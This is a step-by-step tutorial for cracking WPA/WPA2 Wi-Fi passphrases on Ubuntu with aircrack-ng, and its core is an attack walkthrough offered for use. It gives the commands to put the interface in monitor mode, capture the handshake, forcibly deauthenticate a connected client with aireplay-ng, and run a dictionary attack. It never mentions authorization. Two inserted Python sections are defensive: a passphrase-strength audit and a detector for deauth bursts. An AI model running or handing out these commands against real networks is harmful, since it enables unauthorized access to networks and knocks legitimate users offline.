Crack a WPA/WPA2 Wifi Network using Ubuntu 7.10 (Gutsy)



What is the difference between cracking a WPA network and a WPA2 network? Nothing! There is no difference between cracking WPA and WPA2 networks at all. In order to successfully crack any WPA/WPA2 network, two main things must happen:


1) You must capture the full 4-way handshake.

2) Your passphrase must be in the dictionary you choose in order to successfully brute-force it.

We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.

There are a few ways to crack a WPA/WPA2 PSK password; this is just one of them.

This method usually works because of the end user: most people use a passphrase that's easy to remember, because nobody wants to keep a long password.
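To make the two requirements above concrete from the defender's side, here is an added Python example (not part of the original post and not aircrack-ng code) that shows what "in the dictionary" actually means for WPA/WPA2-PSK: the pre-shared key is derived from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 rounds, 256-bit output, as specified in IEEE 802.11i), so the only way to recover it is to derive the key for every candidate and compare. The wordlist, the SSID "MYWIRELESS" from this page, and the function names are constructed for the example; the audit function tells you whether a passphrase you are about to deploy would fall to such a list, and the timing function shows why the 4096 rounds keep guessing slow.

```python
import hashlib
import hmac
import time

# Constructed sample wordlist (not a real dictionary file); WPA passphrases are 8-63 characters.
COMMON_PASSPHRASES = ["password", "12345678", "letmein1", "iloveyou", "qwerty123", "sunshine"]


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK used by WPA/WPA2-PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so the same passphrase gives a different PMK on every network name,
    which is why rainbow tables only exist for the most common SSIDs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def audit_passphrase(passphrase: str, ssid: str, wordlist) -> bool:
    """Return True when `passphrase` is dictionary-weak, i.e. some wordlist entry derives the same PMK.
    Derived keys are compared rather than strings: this is the comparison a dictionary attack has
    to perform once per guess, so it is exactly what requirement 2 above is about."""
    target = derive_pmk(passphrase, ssid)
    return any(hmac.compare_digest(derive_pmk(candidate, ssid), target) for candidate in wordlist)


def guesses_per_second(ssid: str, samples: int = 50) -> float:
    """Measure how many PMK derivations this machine performs per second on one CPU thread.
    The 4096 PBKDF2 rounds are what keep a dictionary attack slow; a passphrase that appears
    in no list is out of reach regardless of this number."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"candidate{i:08d}", ssid)  # constructed throwaway candidates
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    ssid = "MYWIRELESS"  # the example network name used on this page
    for pw in ("password", "Tq7#vL9!pRz2-ouch"):
        print(pw, "-> weak" if audit_passphrase(pw, ssid, COMMON_PASSPHRASES) else "-> not in list")
    print(f"{guesses_per_second(ssid):.0f} PMK derivations per second on this host")
```

The fixed 4096-round cost is per guess per SSID, so the attack rate scales only with the attacker's hardware; the defender's lever is the passphrase itself (length and absence from any published list), and a network that needs stronger guarantees moves to WPA2-Enterprise or WPA3, where no single shared passphrase is derived this way.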

You will need the following details:

A client connected to the AP to deauth.

ESSID = this is the name of your wireless network, i.e. MYWIRELESS
BSSID = this is the MAC address of your AP and will be in this format: 00:1C:10:26:A9:39. Everyone's is different, so make sure you write it down correctly or the following will not work.

Channel = this is the channel your AP is broadcasting on, i.e. channel 7

Also, you will need a decent dictionary file. You can find many of these on the internet; Google is your friend on this one. Then let's start; below are the steps.

Step 1 - Start the wireless interface in monitor mode

airmon-ng start wifi0 (starts your interface in monitor mode; with the madwifi driver this creates the ath0 monitor interface used below)
airodump-ng ath0 (lists the access points and clients in range)

Step 2 - Start airodump-ng to collect authentication handshake

airodump-ng -c 11 -w psk --bssid 00:1C:10:26:A9:39 ath0

Where:

-c 11 is the channel for the wireless network

--bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminates extraneous traffic.

-w psk is the file name prefix for the capture files (psk-01.cap and so on) that will contain the captured packets, including the handshake.

ath0 is the interface name.

Important: Do NOT use the "--ivs" option. You must capture the full packets.

Step 3 - Use aireplay-ng to deauthenticate the wireless client

aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0

Where:

-0 means deauthentication

3 is the number of deauths to send (you can send multiple if you wish)

-a 00:1C:10:26:A9:39 is the MAC address of the access point

-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing

ath0 is the interface name
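Deauthentication frames are unauthenticated management frames, which is why step 3 works and also why it is easy to spot. The following Python example is added here and is not part of the original post or of the aircrack-ng suite: it parses raw 802.11 management frame headers (frame control, duration, three addresses, sequence control, as laid out in the standard) and flags a burst of deauth/disassoc frames that all claim the same sender and BSSID, which is what a wireless IDS watching a monitor-mode capture would alert on. The frames are constructed inline using the AP and client MAC addresses from this page plus one made-up unrelated AP; no radiotap header is modelled, and the threshold, function names and reason code are the example's own assumptions.

```python
import struct
from collections import Counter

# 802.11 management frame header, little-endian: Frame Control, Duration, Addr1, Addr2, Addr3, Seq Ctrl.
MGMT_HEADER = struct.Struct("<HH6s6s6sH")
DEAUTH_FC = 0x00C0    # type 0 (management), subtype 12 (deauthentication), no flags
DISASSOC_FC = 0x00A0  # subtype 10 (disassociation)
BEACON_FC = 0x0080    # subtype 8 (beacon), included as benign background traffic

AP = "00:1C:10:26:A9:39"        # the access point MAC address from this page
CLIENT = "00:0F:B5:EC:99:6F"    # the client MAC address from this page
OTHER_AP = "00:11:22:33:44:55"  # constructed, unrelated AP


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def build_mgmt_frame(fc: int, dst: str, src: str, bssid: str, seq: int, body: bytes = b"") -> bytes:
    """Constructed raw frame bytes as they would appear in a monitor-mode capture (no radiotap header)."""
    return MGMT_HEADER.pack(fc, 0, mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), seq << 4) + body


def parse_mgmt_frame(frame: bytes) -> dict:
    fc, _duration, a1, a2, a3, seq_ctrl = MGMT_HEADER.unpack_from(frame)
    return {"fc": fc, "dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3),
            "seq": seq_ctrl >> 4, "body": frame[MGMT_HEADER.size:]}


def detect_deauth_burst(frames, threshold: int = 3) -> dict:
    """Count deauthentication/disassociation frames per (claimed sender, BSSID) and return the pairs
    whose count reaches `threshold`. A real AP rarely emits several in a short window, and the
    sender address is unauthenticated (so trivially spoofable) unless 802.11w protects it."""
    counts = Counter()
    for frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed["fc"] in (DEAUTH_FC, DISASSOC_FC):
            counts[(parsed["src"], parsed["bssid"])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


REASON_CLASS3 = struct.pack("<H", 7)  # reason code 7: class 3 frame received from a non-associated station

# Constructed capture: two beacons, one isolated deauth on another network, and the burst of
# three deauths that "-0 3" in step 3 produces, all claiming to be sent by the AP.
SAMPLE_FRAMES = [
    build_mgmt_frame(BEACON_FC, "FF:FF:FF:FF:FF:FF", AP, AP, 100),
    build_mgmt_frame(DEAUTH_FC, CLIENT, OTHER_AP, OTHER_AP, 7, REASON_CLASS3),
    build_mgmt_frame(DEAUTH_FC, CLIENT, AP, AP, 1, REASON_CLASS3),
    build_mgmt_frame(BEACON_FC, "FF:FF:FF:FF:FF:FF", AP, AP, 101),
    build_mgmt_frame(DEAUTH_FC, CLIENT, AP, AP, 2, REASON_CLASS3),
    build_mgmt_frame(DEAUTH_FC, CLIENT, AP, AP, 3, REASON_CLASS3),
]

if __name__ == "__main__":
    for (src, bssid), n in detect_deauth_burst(SAMPLE_FRAMES).items():
        print(f"deauth burst: {n} frames claiming source {src} on BSSID {bssid}")
```

The only real fix on the AP side is 802.11w (Protected Management Frames), which authenticates deauth and disassoc frames so that forged ones are dropped; where that is not available, alerting on bursts like the one above at least tells you a handshake capture was probably just attempted.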

Step 4 - Run aircrack-ng to crack the pre-shared key

aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap

Where:

-w dictionary.txt is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.

-b 00:1C:10:26:A9:39 is the MAC address of the access point, so aircrack-ng only works on that network's handshake.

psk*.cap is the name of the group of files containing the captured packets. Notice that we used the wildcard * to include multiple files.

Done. Now wait for some time; how long depends on your dictionary file and the passphrase.

You should now have your PSK passphrase.

&<>evilmonkey000<>&



